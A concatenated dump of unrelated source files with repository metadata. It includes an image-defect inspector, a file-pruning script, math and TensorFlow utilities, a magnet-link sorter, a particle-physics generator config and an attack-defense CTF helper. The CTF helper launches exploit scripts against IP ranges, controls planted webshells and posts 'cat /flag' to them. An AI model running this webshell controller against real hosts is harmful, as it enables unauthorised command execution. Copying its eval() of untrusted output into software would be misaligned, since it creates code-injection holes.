from PyQt5.QtWidgets import QApplication
from PyQt5.QtWidgets import QDialog
from PyQt5.QtWidgets import QProgressBar
from PyQt5.QtCore import QThread
from PyQt5.QtCore import pyqtSignal
from tqdm import tqdm
from detection_tool.transformation.image_function import Image
# CLI options.  class_info/path_info arrive as Python-literal strings and are
# eval()'d inside External.run — trusted input only.
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--individual_path', help='Individual inspection progress', nargs='+', default=[])
parser.add_argument("-c", "--class_info", help="Class information.")
parser.add_argument("-p", "--path_info", help="Path information.")
args = parser.parse_args()
TIME_LIMIT = 100  # NOTE(review): appears unused in this module — confirm before removing
class External(QThread):
    """Worker thread that runs the XOR-based defect inspection.

    Emits countChanged(percent) so the dialog's progress bar can update;
    progress advances once per defect class, not per image.
    """
    countChanged = pyqtSignal(int)
    def run(self):
        count = 0
        self.countChanged.emit(count)
        s = time.time()
        # CLI strings are Python literals (dict of paths / dict of classes).
        # WARNING: eval() executes arbitrary code — trusted input only.
        path_info = eval(args.path_info)
        class_info = eval(args.class_info)
        crop_path = os.path.abspath(path_info['crop_path'])
        origin_path = os.path.abspath(path_info['origin_path'])
        normal_path = os.path.abspath(path_info['xor_normal_path'])
        result_path = os.path.abspath(path_info['xor_result_path'])
        test_path = os.path.abspath(path_info['xor_test_path'])
        labeled_path = os.path.abspath(path_info['labeled_path'])
        classes = class_info.values()
        # Start from a clean slate: drop output directories from previous runs.
        if os.path.exists(crop_path):
            shutil.rmtree(crop_path)
        if os.path.exists(origin_path):
            shutil.rmtree(origin_path)
        if os.path.exists(result_path):
            shutil.rmtree(result_path)
        if os.path.exists(labeled_path):
            shutil.rmtree(labeled_path)
        print('\n ******************' + 'Start Defect Inspection' + '******************')
        for defect in classes:
            # Progress advances one class at a time.
            count += 100 / len(classes)
            print('\n ----------------' + defect + '----------------')
            _test_path = os.path.abspath(os.path.join(test_path, defect))
            files = os.listdir(_test_path) if os.path.exists(_test_path) else []
            if not os.path.exists(crop_path):
                os.makedirs(crop_path)
            if not os.path.exists(origin_path):
                os.makedirs(origin_path)
            if not os.path.exists(result_path):
                os.makedirs(result_path)
            if not os.path.exists(os.path.abspath(os.path.join(origin_path, defect))):
                os.mkdir(os.path.abspath(os.path.join(origin_path, defect)))
            tot_sum = 0
            for i in tqdm(range(len(files))):
                # Only files explicitly selected via -i/--individual_path are inspected.
                if str(os.path.join(_test_path, files[i])).replace('\\', '/') in args.individual_path:
                    tot_sum += i
                    test_image = cv2.imread(os.path.join(_test_path, files[i]))
                    # Reference image shares the prefix before the first '_'.
                    test_filename = files[i].split('_')[0] + '.JPG'
                    ref_image = cv2.imread(os.path.join(normal_path, test_filename))
                    # Align the test image to the reference, diff, filter, then
                    # crop and record defect regions.
                    transform_image = Image().registriation(test_image, ref_image)
                    diff_image = Image().image_comparison(transform_image, ref_image)
                    filtered_image = Image().image_filter(diff_image)
                    _, _ = Image().image_defect(filtered_image, transform_image, size=32,
                                                correction=20,
                                                filename1=files[i].split('.')[0],
                                                filename2=files[i],
                                                crop_path=os.path.join(crop_path,),
                                                origin_path=os.path.join(origin_path, defect),
                                                result_path=result_path)
                self.countChanged.emit(count)
            # Korean: "number of detected files".  NOTE(review): tot_sum adds the
            # *indices* of matched files, not 1 per file — looks like a bug; confirm.
            print('\n 검출 파일 수 : ' + str(tot_sum))
        print('\n ******************' + 'Defect Extraction Completed' + '*************************')
        e = time.time()
        print(e - s)
class Actions(QDialog):
    """Dialog holding a progress bar that is driven by the inspection thread.

    (Original docstring, Korean: "A dialog box composed of a progress bar
    and buttons.")
    """
    def __init__(self):
        super().__init__()
        self.progress = None  # QProgressBar, created in initUI
        self.calc = None      # External worker thread, created in initUI
        self.initUI()
    def initUI(self):
        # The bar must exist before the worker starts emitting progress.
        self.setWindowTitle('Defect Inspection in progress')
        self.progress = QProgressBar(self)
        self.progress.setGeometry(0, 0, 300, 25)
        self.progress.setMaximum(100)
        self.progress.move(10, 10)
        self.progress.setStyleSheet("QProgressBar { text-align: center; } ")
        self.show()
        # Wire the worker's signal to this dialog, then start the inspection.
        self.calc = External()
        self.calc.countChanged.connect(self.onCountChanged)
        self.calc.start()
    def onCountChanged(self, value):
        # Slot: update the bar; close the dialog once work reaches 100%.
        self.progress.setValue(value)
        if value == 100:
            self.close()
if __name__ == "__main__":
app = QApplication(sys.argv)
window = Actions()
sys.exit(app.exec_())
| [
"ga.seunghan@iset-da.com"
] | ga.seunghan@iset-da.com |
71f9e62bbb3f01f87d8d51c517e350f8129ab20b | 7ee95e82bf001151761760adee6c8daafdd0f53d | /main.py | 3d3d4a4c6da2d672c98e1f68d568a7419d0126ad | [] | no_license | mjohnson518/ndc-api | 934f90612802396fe66dd0bb75fbaa1a53f4239b | a45f6661f2007abaffde422eb1e4b525f09473f5 | refs/heads/master | 2023-03-17T18:49:02.267594 | 2021-03-03T15:40:42 | 2021-03-03T15:40:42 | 299,637,605 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 56 | py | from config.wsgi import application
# Expose the WSGI callable under the conventional name `app` so servers and
# launchers that look for `app` can find it.
app = application
| [
"marcjohnson518@gmail.com"
] | marcjohnson518@gmail.com |
18d2490212c96c729ab2d95a3c7d7a6c16515918 | 8ef64c761140d0d0c0a05b9252a378417677b47f | /release-cleaner.py | 938fc5d3b43daf5459478cc9428c2c624e1750b3 | [] | no_license | howaminotme/python-experiments | cfae41edb9cbe38b166847470ac8df3851d6fc51 | 434db77847f32cb011d2e0b666c6abd7d3c748b2 | refs/heads/master | 2021-01-16T18:18:12.554340 | 2014-11-22T18:28:29 | 2014-11-22T18:28:29 | 12,466,538 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,123 | py | #!/usr/bin/env python
import time
import subprocess
from optparse import OptionParser
# Parse repeated -t/--target specs of the form "dir:max_count:ignore_pattern".
parser = OptionParser()
parser.add_option('-t', '--target', type='string', action='append', dest='target', help='Directories to be cleaned, with base number of files to be kept and file expressions to ignore, Format : /home/ec2-user/debtapp/current:10:gz')
(opts, args) = parser.parse_args()
# NOTE(review): `target` is None when no -t is given; the main loop below
# would then raise TypeError when iterating it.
target = opts.target
def clean(x):
    """Prune the oldest files in a target directory down to its base count.

    `x` is a colon-separated spec "dir:max_objects:ignore_pattern", e.g.
    "/home/ec2-user/debtapp/current:10:gz".  Files whose names match the
    grep pattern are ignored both when counting and when deleting; the
    oldest (by mtime, via `ls -tr`) surplus files are removed.

    NOTE(review): the spec is interpolated straight into shell commands
    (shell=True), so specs must come from a trusted source.
    """
    bits = x.split(":")
    target_dir = bits[0]
    max_objects = int(bits[1])
    ignore_objects = bits[2]
    # Count the non-ignored files currently present in the target directory.
    counter = subprocess.Popen(
        ["ls -tr %s | grep -v %s | wc -l" % (target_dir, ignore_objects)],
        shell=True, stdout=subprocess.PIPE)
    count = int(counter.communicate()[0])
    excess = count - max_objects
    # Bug fix: only delete when actually over the threshold.  The old code
    # always ran the rm pipeline, producing "head -<negative>" and a bare
    # "xargs rm" invocation when the directory was under the limit.
    if excess <= 0:
        return
    # Remove the `excess` oldest files (cd first so the bare names printed
    # by ls resolve inside the target directory).
    subprocess.call(
        ["cd %s ; ls -tr %s | grep -v %s | head -%s | xargs rm"
         % (target_dir, target_dir, ignore_objects, excess)],
        shell=True)
#call clean on all targets passed to script
# Daemon loop: prune every target once, then sleep an hour and repeat.
while True:
    for i in target:
        clean(i)
    time.sleep(3600)
| [
"bobby@bobby-ThinkPad-T420.(none)"
] | bobby@bobby-ThinkPad-T420.(none) |
f32d24f9fdb32d8eb2a1eef5c82ae7102d01c864 | cc5f2ee6a5de6faf141f10b1b10717243821a0a5 | /problems/problem 106.py | e9b15f310b5e23ecf09e8a1864e6f1ea2dd3f449 | [] | no_license | alexandrepoulin/ProjectEulerInPython | faf634025c86bc74fc764d315813bf1706e58f63 | 97cb52cdd7508f2db891d1644e3d247814571718 | refs/heads/master | 2020-04-22T11:47:04.594328 | 2019-02-16T00:17:40 | 2019-02-16T00:17:40 | 170,341,883 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 793 | py | print("Starting")
import useful
## only need to check subset pairs which have the same number of elements
## there are useful.nChooseK(n,s)*useful.nChooseK(n-s,s)*0.5 such pairs
## for a specific subset, we only need to look at pairs which have interweining elements
## such as (1,3)(2,4)
## number of times this doesn't happend is given by Catalan numbers given by c
## multiply that by the total number of ways to make two subsets of that size
## or useful.nChooseK(n,2*s)
## and you find how many pairs you need to check for a subset size
def c(s):
    """Catalan number C_s = C(2s, s) / (s + 1)."""
    binom = useful.nChooseK(2 * s, s)
    return binom / (s + 1)
def x(n, s):
    """Number of size-s subset pairs of an n-element set that still need an
    explicit comparison (total disjoint pairs minus the Catalan-counted
    non-interleaving ones)."""
    total_pairs = useful.nChooseK(n, s) * useful.nChooseK(n - s, s) * 0.5
    return total_pairs - c(s) * useful.nChooseK(n, 2 * s)
# Project Euler 106: sum, over subset sizes 2..6 of a 12-element set, the
# number of subset pairs that must be tested for equality.
answer = 0
N= 12
for s in range(2,7):
    answer += x(N,s)
print(answer)
| [
"alexpoulice@gmail.com"
] | alexpoulice@gmail.com |
0fb85e28da39a06a15a5bb8f4c3e0c42615285b3 | 90b92cc5ec851ba02eb62ef66faac5124d2b4004 | /lab.py | bd5c434acf8d08ef2e9b00350a7e116972bdc47b | [] | no_license | CodecoolGlobal/first-game-python-404-groupname-not-found | 326b32ad2d30b09f7cdb6fd249d8da75791db8cb | d748b74c8170e070c29b5da91da111c6625621d0 | refs/heads/master | 2020-06-27T19:50:27.309800 | 2019-08-01T23:07:27 | 2019-08-01T23:07:27 | 200,034,331 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 780 | py | def openmap(file): # Reads the map.txt file and returns it as grid
with open(file, "r") as coords:
map = [[char for char in line] for line in coords]
return map
def printmap(map): # Prints the whole map as a string
    """Flatten the grid into one string.

    Each row is a list of single-character strings (rows produced by the
    map loader keep their trailing newline as a cell), so joining every
    cell of every row reproduces the original text verbatim.

    Replaces the old index-based `for i in range(len(map))` loop with a
    direct join over the rows; behavior is unchanged.
    """
    return ''.join(''.join(row) for row in map)
def victory(): # Reads and returns the "Victory text"
    """Return the victory message from win.txt as a list of lines."""
    with open("win.txt", "r") as banner:
        return banner.readlines()
def atplace(map, char): # Returns the coordinates of the @ symbol
place = []
for y in range(len(map)):
if char in map[y]:
place.append(y)
place.append(map[y].index(char))
break
return place | [
"krisztian@pometko.hu"
] | krisztian@pometko.hu |
a17b7c155f7613f9593547322fbe5f0fed743010 | 284024e804a5bb4129ebd4f0e835a86144b9fc8c | /const.py | 8d16efbab47fa555252a0da697c9026c26524b16 | [] | no_license | sunnypwang/honk-raid-bot | 1091d15b15bfa27c5aa634b95163b662e0ed85f5 | 3c246f4240770aef52a06242407941c35929d2cd | refs/heads/master | 2020-11-23T18:37:15.262575 | 2020-03-07T16:12:30 | 2020-03-07T16:12:30 | 227,770,974 | 0 | 1 | null | 2020-03-07T16:12:31 | 2019-12-13T06:22:53 | Python | UTF-8 | Python | false | false | 85 | py | import os
# Bot API token, read at import time; os.environ[...] raises KeyError if the
# variable is unset, so a misconfigured deployment fails fast.
BOT_TOKEN = os.environ['BOT_TOKEN']
SHEET_URL = os.environ['SHEET_URL'] | [
"noreply@github.com"
] | noreply@github.com |
8c7259cafebf5ebbaa2fbd3663278c7ee04d2a70 | 57750e1b1bc7a4260480d12c5f4b4d1130de4a39 | /models/order_list.py | 67fa792ea1865d347f1db01ca553e571e74ac284 | [] | no_license | stmccoy/Flask_lab_1 | 3c64da93e209e58196e7524920fa63473d532778 | b69cb5a26c35557c6745464bf9983ba886d719ed | refs/heads/main | 2023-04-01T14:39:14.459435 | 2021-04-14T15:11:59 | 2021-04-14T15:11:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 141 | py | from models.order import *
order_1 = Order("Fred", "07/04/2021", 5)
order_2 = Order("Sandra", "13/04/2021", 10)
orders = [order_1, order_2] | [
"giulianoderosas@gmail.com"
] | giulianoderosas@gmail.com |
d1c16aaedb8a8c6c729f677384d7b278cec936b3 | c4f746f7f7cdad7a843acf693efd1a0f32ff9460 | /small_train/utils.py | 46c1f83bc04f33e087d29595b12764b36ef03f8a | [] | no_license | jon-wong-sutd/ml-workshop | 1b08ba90d267bf317b630a4cff570c369236da41 | 9d842263744068156a52124f8817ad708259721c | refs/heads/master | 2020-12-14T08:50:50.443241 | 2017-06-29T00:50:44 | 2017-06-29T00:50:44 | 95,509,633 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,476 | py | from math import sqrt
import tensorflow as tf
def kernel_on_grid(kernel, pad):
    """Arrange a conv-kernel tensor as a single image grid for TensorBoard.

    Assumes `kernel` is a TF1-style tensor of shape
    [height, width, channels, n_filters] — the `.value` access below requires
    the old (non-eager) shape API.  The filters are tiled into a roughly
    square (grid_Y x grid_X) mosaic with `pad` border pixels around each
    filter, and returned with shape [1, grid_w, grid_h, channels] suitable
    for an image summary (batch size 1).
    """
    # Pick the most square (rows, cols) factorization of the filter count.
    def factorization(n):
        for i in range(int(sqrt(float(n))), 0, -1):
            if n % i == 0:
                # if i == 1: print('Who would enter a prime number of filters')
                return (i, int(n / i))
    (grid_Y, grid_X) = factorization (kernel.get_shape()[3].value)
    # print ('grid: %d = (%d, %d)' % (kernel.get_shape()[3].value, grid_Y, grid_X))
    # NOTE(review): x_min/x_max are computed but unused — the normalization
    # below is commented out, so raw kernel values are visualized.
    x_min = tf.reduce_min(kernel)
    x_max = tf.reduce_max(kernel)
    # kernel = (kernel - x_min) / (x_max - x_min)
    # pad X and Y
    x = tf.pad(kernel, tf.constant( [[pad,pad],[pad, pad],[0,0],[0,0]] ), mode = 'CONSTANT')
    # X and Y dimensions, w.r.t. padding
    Y = kernel.get_shape()[0] + 2 * pad
    X = kernel.get_shape()[1] + 2 * pad
    channels = kernel.get_shape()[2]
    # put NumKernels to the 1st dimension
    x = tf.transpose(x, (3, 0, 1, 2))
    # organize grid on Y axis
    x = tf.reshape(x, tf.stack([grid_X, Y * grid_Y, X, channels]))
    # print(x.shape)
    # switch X and Y axes
    x = tf.transpose(x, (0, 2, 1, 3))
    # organize grid on X axis
    x = tf.reshape(x, tf.stack([1, X * grid_X, Y * grid_Y, channels]))
    # back to normal order (not combining with the next step for clarity)
    x = tf.transpose(x, (2, 1, 3, 0))
    # to tf.image_summary order [batch_size, height, width, channels],
    # where in this case batch_size == 1
    x = tf.transpose(x, (3, 0, 1, 2))
    # scaling to [0, 255] is not necessary for tensorboard
    return x
| [
"jhannwong@gmail.com"
] | jhannwong@gmail.com |
24fe9556ce940ab8806e5db0a44a5d00d39fa360 | f2ff9b13a4fcb9330e59e87d08ef542d6ddba18a | /src/data/tweets2sqlite.py | 251168e3778b696738cdfbdf6bf455e2c7f18861 | [
"MIT"
] | permissive | EmbeddML/peap-analysis | 489732dc2d71a1428372b29fbc18ca620d224c88 | 14eb75cdaa60842dd9b530c10c47985aa77f8ff7 | refs/heads/master | 2023-08-19T09:25:05.260246 | 2021-10-12T20:21:20 | 2021-10-12T20:21:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 797 | py | import pandas as pd
from sqlalchemy import create_engine
import click
@click.command()
@click.option(
    "-t",
    "--tweets-file",
    "tweets_file",
    type=click.Path(dir_okay=False, exists=True, readable=True),
    required=True,
)
@click.option(
    "-s",
    "--sqlite-file",
    "sqlite_file",
    type=click.Path(dir_okay=False, readable=True),
    required=True,
)
@click.option(
    "-n",
    "--db-name",
    "db_name",
    type=click.STRING,
    default='tweets',
    required=True
)
def save_to_sqlite(tweets_file: str, sqlite_file: str, db_name: str):
    """Load a pickled tweets DataFrame and write it into an SQLite table."""
    frame = pd.read_pickle(tweets_file)
    frame.to_sql(db_name, con=create_engine(f'sqlite:///{sqlite_file}'))
if __name__ == '__main__':
    # click parses sys.argv and supplies the parameters, hence the bare call
    # and the disabled "no-value-for-parameter" warning.
    save_to_sqlite()  # pylint: disable=no-value-for-parameter
| [
"p.gramacki@gmail.com"
] | p.gramacki@gmail.com |
f2903089615d4356f19532dc60fb14fac9acfb99 | 7a8ba5cc264b58462b8cad88a70297876dbd2876 | /SearchJavMaglink/anls/anlslink.py | a552821d4fa6a72191d6e19ecd2a52a3f479a86b | [
"MIT"
] | permissive | Roger-tn-su/SearchJavMaglink | 6f3e6500f7762e92e102a8ec024b71b8506100a4 | 604e6e4c3ac943dedba16293a8b41f4a8f19c351 | refs/heads/master | 2020-08-03T01:42:10.748016 | 2020-01-15T07:08:43 | 2020-01-15T07:08:43 | 211,579,204 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,704 | py | #encoding: utf-8
"""
@project = SearchJavMaglink
@file = anlslink
@author = ThinkPad
@create_time = 2019-09-2917:00
"""
import re
import xlrd
import xlwt
def take_size(av_info_elem):
    """Sort key for magnet records: the size field stored at index 3."""
    size_field = av_info_elem[3]
    return size_field
# def get_av_info(ax_xls_file, av_info_list):
# jav_workbook = xlrd.open_workbook(ax_xls_file)
# jav_sheet = jav_workbook.sheets()[0]
# for i in range(0, jav_sheet.nrows):
# av_info_list.append(jav_sheet.row(i))
# def anls_mag(mag_info_list[:],valid_mag_list,bak_mag_list):
# while len(mag_info_list):
# anls_slice = mag_info_list[:int(mag_info_list[0][6].value)]
# del mag_info_list[:int(mag_info_list[0][6].value)]
# xls_file = 'jurujuesebanyantest.xls'
# xls_path_file = 'D:/Python/Project/ExcelAccess/SearchJavMaglink/datafile/' + xls_file
# output_file = 'jurutest.xls'
# output_path_file = 'D:/Python/Project/ExcelAccess/SearchJavMaglink/outputfile/' + output_file
# av_mag_info_list = []
# av_valid_mag_list = []
# av_bak_mag_list = []
# av_act_slice = []
# av_act_mag_list = []
def anls_mag(mag_list,first_list,second_list,bak_list,error_list):
    """Partition magnet-link records into quality buckets (consumes mag_list).

    Each record is indexable: [0] = movie code like "ABC-123", [1] = extra
    info, [2] = link title, [3] = size, ..., [6] = number of candidate links
    sharing this code.  NOTE(review): field meanings inferred from usage in
    this function — confirm against the spreadsheet loader.  Records are
    processed in runs of mag_list[0][6] entries; the first well-formed title
    match per run goes to first_list, other title matches to second_list,
    non-matching titles to bak_list, and runs with no usable match are
    reported in error_list as [code, info, 'no matched item'].
    """
    # Titles matching this look like well-formed releases (bracketed site
    # tag, a specific studio marker, a .mp4 suffix, or a leading "#_").
    legal_pattern = r'(\[.+\..+\])|(【入微】)|(\.mp4$)|(^\#\_)'
    # Titles from this particular source are rejected outright.
    illegal_pattern = r'(第一会所)|(第一會所)'
    # get_av_info(xls_path_file, av_mag_info_list)
    while len(mag_list):
        flag = 0
        # Take the next run of related records off the front of the list
        # (destructive: the slice is deleted from mag_list).
        av_slice = mag_list[:int(mag_list[0][6])]
        del mag_list[:int(mag_list[0][6])]
        av_slice.sort(key=take_size)
        for item in av_slice[:]:
            # Loose pattern: both halves of the movie code must appear
            # somewhere in the title, in order.
            av_code_pattern = r'.*' + item[0].split('-', 1)[0] + r'.*' + item[0].split('-', 1)[1] \
                              + r'.*'
            if re.search(illegal_pattern, item[2], re.IGNORECASE) is not None:
                continue
            elif re.search(av_code_pattern, item[2], re.IGNORECASE) is not None:
                # Only the first legal-looking title in the size-sorted run
                # is promoted to first_list; later ones go to second_list.
                if (re.search(legal_pattern, item[2], re.IGNORECASE) is not None) and \
                        (flag == 0):
                    first_list.append(item)
                    flag = 1
                else:
                    second_list.append(item)
            else:
                bak_list.append(item)
        if flag == 0:
            error_list.append(
                [av_slice[0][0], av_slice[0][1], 'no matched item'])
# print(len(av_mag_info_list), av_mag_info_list)
# print (len(av_act_mag_list),av_act_mag_list)
# print(len(av_valid_mag_list), av_valid_mag_list)
# print(len(av_bak_mag_list), av_bak_mag_list)
# wt_mag_link(output_path_file, av_act_mag_list, av_valid_mag_list, av_bak_mag_list)
# anls_slice = av_mag_info_list[:int(av_mag_info_list[0][6].value)]
# del av_mag_info_list[:int(av_mag_info_list[0][6].value)]
# anls_slice.sort(key=take_size)
| [
"roger_su@163.com"
] | roger_su@163.com |
8adf0f6e46167b035d5473943b9b2eea97559606 | 709f734cdd3530f8a3ff81c83b08d502946f73e8 | /core/attack.py | e6be5e5fc11e5358018eb189c34314f70a151919 | [] | no_license | ccccm4/awd_framework | fab5e9f337f73518f56c70e1b5501b5818f7f266 | 37c1bb206fb1bc704feadb935dfe35443c765415 | refs/heads/master | 2020-06-22T12:13:20.588116 | 2019-07-19T06:21:52 | 2019-07-19T06:21:52 | 197,713,326 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,543 | py | # _*_ coding: utf8 _*_
import re
import os
import pickle
import popen2
import requests
# Matches CTF flags of the form flag{...} in webshell responses.
flag_pattern = re.compile('flag\{.*\}')
class Attack():
    """AWD (attack/defense CTF) helper: keeps a per-server target list,
    launches exploit scripts, and collects flags / webshell credentials.

    State is persisted between runs as pickle files under data/.  This is
    Python 2 code (print statements, the removed `popen2` module).
    """
    def __init__(self):
        # Restore persisted state; on any failure (first run, missing or
        # corrupt files) fall back to empty containers.
        try:
            with open('data/ip_list.pickle','r') as fp:
                self.ip_list = pickle.load(fp)
            with open('data/exploits.pickle','r') as fp:
                self.exploits = pickle.load(fp)
            with open('data/webshell_data.pickle','r') as fp:
                self.webshell_data = pickle.load(fp)
            with open('data/flag.pickle','r') as fp:
                self.flag = pickle.load(fp)
        except:
            self.ip_list = {}
            self.exploits = []
            self.webshell_data = {}
            self.flag = []
    # Build the URL list for one game server: 'x' in the ip template is
    # replaced by 0..num-1 (e.g. "1.1.x.1" or "1.1.1.x").
    def set_ip_1(self,ad_server_name,ip,port,num): # check if ip in the list
        self.ip_list[ad_server_name] = []
        for i in range(int(num)):
            url = 'http://'+ip.replace('x',str(i))+':'+port
            self.ip_list[ad_server_name].append(url)
        with open('data/ip_list.pickle','wb') as fp:
            pickle.dump(self.ip_list,fp)
    # Collect exploit script names from ./exp (recursively) and persist them.
    def load_exp(self): # feature
        for root, dirs, files in os.walk('./exp'):
            for i in files:
                self.exploits.append(i)
        with open('data/exploits.pickle','wb') as fp:
            pickle.dump(self.exploits,fp)
    # TODO(review): original note mentions threading and awkward ip argument
    # passing — note the whole URL list str(ip), not the single target i, is
    # handed to the exploit script below; confirm that is intended.
    def exploit(self,ad_server_name,exp):
        ip = self.ip_list[ad_server_name]
        for i in ip:
            print i
            # cmd = 'dir'
            try:
                cmd = 'python2 ' + './exp/' + exp.replace('.py','') + '.py ' + str(ip)
                fr,fw,fe = popen2.popen3(cmd) # popen3
                # print fr.read()
                # WARNING: eval() of the exploit's stdout executes arbitrary
                # code in this process (original comment: "rce warning hehe").
                tmp = eval(fr.read())
                if tmp:
                    if tmp[0]:
                        self.flag.append(tmp[0])
                    if tmp[1]:
                        self.webshell_data[tmp[1]] = i + str('/.config.php')
                # collected flags and webshell urls are persisted below
                fe.close()
                fr.close()
                fw.close()
            except:
                print fe.read()
                fe.close()
                fr.close()
                fw.close()
        with open('data/webshell_data.pickle','wb') as fp:
            pickle.dump(self.webshell_data,fp)
        with open('data/flag.pickle','wb') as fp:
            pickle.dump(self.flag,fp)
    def submit_flag(self):
        # Submit collected flags to the scoring server.
        if self.flag:
            # TODO: implement yourself (original note)
            pass
    def manage_shell(self,cmd,flag='0'):
        # Run `cmd` on every stored webshell; with flag='1' grab /flag instead.
        # NOTE(review): likely bug — `webshell_data` below is an undefined
        # global (probably meant self.webshell_data.items(); iterating a dict
        # yields keys only, so the tuple unpacking would also fail).
        if self.webshell_data:
            for passwd,url in webshell_data:
                if flag == '1':
                    try:
                        r = requests.post(url=url,data={passwd:'cat /flag'})
                        f = flag_pattern.findall(r.content)[0]
                        self.flag.append(f)
                    except:
                        print 'miaomiaomiao'
                else:
                    try:
                        r = requests.post(url=url,data={passwd:cmd})
                        print r.content
                    except:
                        print 'miaomiaomiao'
        with open('data/flag.pickle','wb') as fp:
            pickle.dump(self.flag,fp)
| [
"noreply@github.com"
] | noreply@github.com |
020ceae132754010f36ebf19881b9db9014ed256 | 3f95c72a6ad383a8c929ccff679d4635223e39e7 | /powheg_2017/ggH_SM.py | a8936c8ca06167fa97c0b336b9201d970b30df1c | [] | no_license | danielwinterbottom/MC_gen | 88d2a7395b276b57433a4d1699c167bba25a7518 | a814a7ed8f1921ee459c7c2f39d8d160e47c13c2 | refs/heads/master | 2020-06-20T17:56:02.320861 | 2019-08-12T08:33:42 | 2019-08-12T08:33:42 | 197,200,615 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,358 | py | # Auto generated configuration file
# using:
# Revision: 1.19
# Source: /local/reps/CMSSW/CMSSW/Configuration/Applications/python/ConfigBuilder.py,v
# with command line options: Configuration/GenProduction/python/HIG-RunIIFall17wmLHEGS-02619-fragment.py --fileout file:HIG-RunIIFall17wmLHEGS-02619.root --mc --eventcontent RAWSIM,LHE --datatier GEN-SIM,LHE --conditions 93X_mc2017_realistic_v3 --beamspot Realistic25ns13TeVEarly2017Collision --step LHE,GEN,SIM --nThreads 8 --geometry DB:Extended --era Run2_2017 --python_filename HIG-RunIIFall17wmLHEGS-02619_1_cfg.py --no_exec --customise Configuration/DataProcessing/Utils.addMonitoring --customise_commands process.RandomNumberGeneratorService.externalLHEProducer.initialSeed=int(1542798870%100) -n 100
# Framework setup for the wmLHE+GEN+SIM job: load the standard CMSSW
# sequences needed for event generation and Geant4 simulation with the
# Run-2 2017 detector scenario.
import FWCore.ParameterSet.Config as cms
from Configuration.StandardSequences.Eras import eras
# Run2_2017 era enables the 2017-specific detector modifiers.
process = cms.Process('SIM',eras.Run2_2017)
# import of standard configurations
process.load('Configuration.StandardSequences.Services_cff')
process.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')
process.load('FWCore.MessageService.MessageLogger_cfi')
process.load('Configuration.EventContent.EventContent_cff')
# mixNoPU: no pile-up is mixed in at this production step.
process.load('SimGeneral.MixingModule.mixNoPU_cfi')
process.load('Configuration.StandardSequences.GeometryRecoDB_cff')
process.load('Configuration.StandardSequences.GeometrySimDB_cff')
process.load('Configuration.StandardSequences.MagneticField_cff')
process.load('Configuration.StandardSequences.Generator_cff')
# Vertex smearing tuned for the early-2017 25 ns collision scenario.
process.load('IOMC.EventVertexGenerators.VtxSmearedRealistic25ns13TeVEarly2017Collision_cfi')
process.load('GeneratorInterface.Core.genFilterSummary_cff')
process.load('Configuration.StandardSequences.SimIdeal_cff')
process.load('Configuration.StandardSequences.EndOfProcess_cff')
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
# Number of events to attempt in this job (matches the -n 100 cmsDriver option).
process.maxEvents = cms.untracked.PSet(
    input = cms.untracked.int32(100)
)
# Input source: events are produced from scratch, not read from a file.
process.source = cms.Source("EmptySource")
process.options = cms.untracked.PSet(
)
# Production Info
process.configurationMetadata = cms.untracked.PSet(
    annotation = cms.untracked.string('Configuration/GenProduction/python/HIG-RunIIFall17wmLHEGS-02619-fragment.py nevts:100'),
    name = cms.untracked.string('Applications'),
    version = cms.untracked.string('$Revision: 1.19 $')
)
# Output definition
# GEN-SIM output file; only events accepted by the generation step
# (i.e. passing the generator's HepMC filter) are written out.
process.RAWSIMoutput = cms.OutputModule("PoolOutputModule",
    SelectEvents = cms.untracked.PSet(
        SelectEvents = cms.vstring('generation_step')
    ),
    compressionAlgorithm = cms.untracked.string('LZMA'),
    compressionLevel = cms.untracked.int32(9),
    dataset = cms.untracked.PSet(
        dataTier = cms.untracked.string('GEN-SIM'),
        filterName = cms.untracked.string('')
    ),
    eventAutoFlushCompressedSize = cms.untracked.int32(20971520),
    fileName = cms.untracked.string('file:HIG-RunIIFall17wmLHEGS-02619.root'),
    outputCommands = process.RAWSIMEventContent.outputCommands,
    splitLevel = cms.untracked.int32(0)
)
# LHE-tier output module; defined here but its EndPath is left out of the
# schedule in the original configuration, so no LHE file is produced.
process.LHEoutput = cms.OutputModule("PoolOutputModule",
    dataset = cms.untracked.PSet(
        dataTier = cms.untracked.string('LHE'),
        filterName = cms.untracked.string('')
    ),
    fileName = cms.untracked.string('file:HIG-RunIIFall17wmLHEGS-02619_inLHE.root'),
    outputCommands = process.LHEEventContent.outputCommands,
    splitLevel = cms.untracked.int32(0)
)
# Additional output definition
# Other statements
process.XMLFromDBSource.label = cms.string("Extended")
# Only events passing the generation step continue down filtered paths.
process.genstepfilter.triggerConditions=cms.vstring("generation_step")
# Detector conditions: 2017 MC realistic global tag.
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, '93X_mc2017_realistic_v3', '')
# Pythia8 hadronizer: showers/hadronizes the POWHEG LHE events and decays
# the 125 GeV Higgs exclusively to tau pairs.  The embedded HepMCFilter
# keeps only events whose di-tau final state passes the acceptance cuts
# below, with a single hadronization attempt per LHE event (nAttempts = 1).
process.generator = cms.EDFilter("Pythia8HadronizerFilter",
    nAttempts = cms.uint32(1),
    HepMCFilter = cms.PSet(
        filterName = cms.string('EmbeddingHepMCFilter'),
        filterParameters = cms.PSet(
            # Per-channel pT/eta acceptance cuts on the visible tau decay
            # products (El = electron, Mu = muon, Had = hadronic tau).
            ElElCut = cms.string('El1.Pt > 22 && El2.Pt > 10 && El1.Eta < 2.6 && El2.Eta < 2.6'),
            ElHadCut = cms.string('El.Pt > 22 && Had.Pt > 16 && El.Eta < 2.6 && Had.Eta < 2.6'),
            ElMuCut = cms.string('Mu.Pt > 9 && El.Pt > 11 && El.Eta < 2.6 && Mu.Eta < 2.5'),
            HadHadCut = cms.string('Had1.Pt > 33 && Had2.Pt > 33 && Had1.Eta < 2.2 && Had2.Eta < 2.2'),
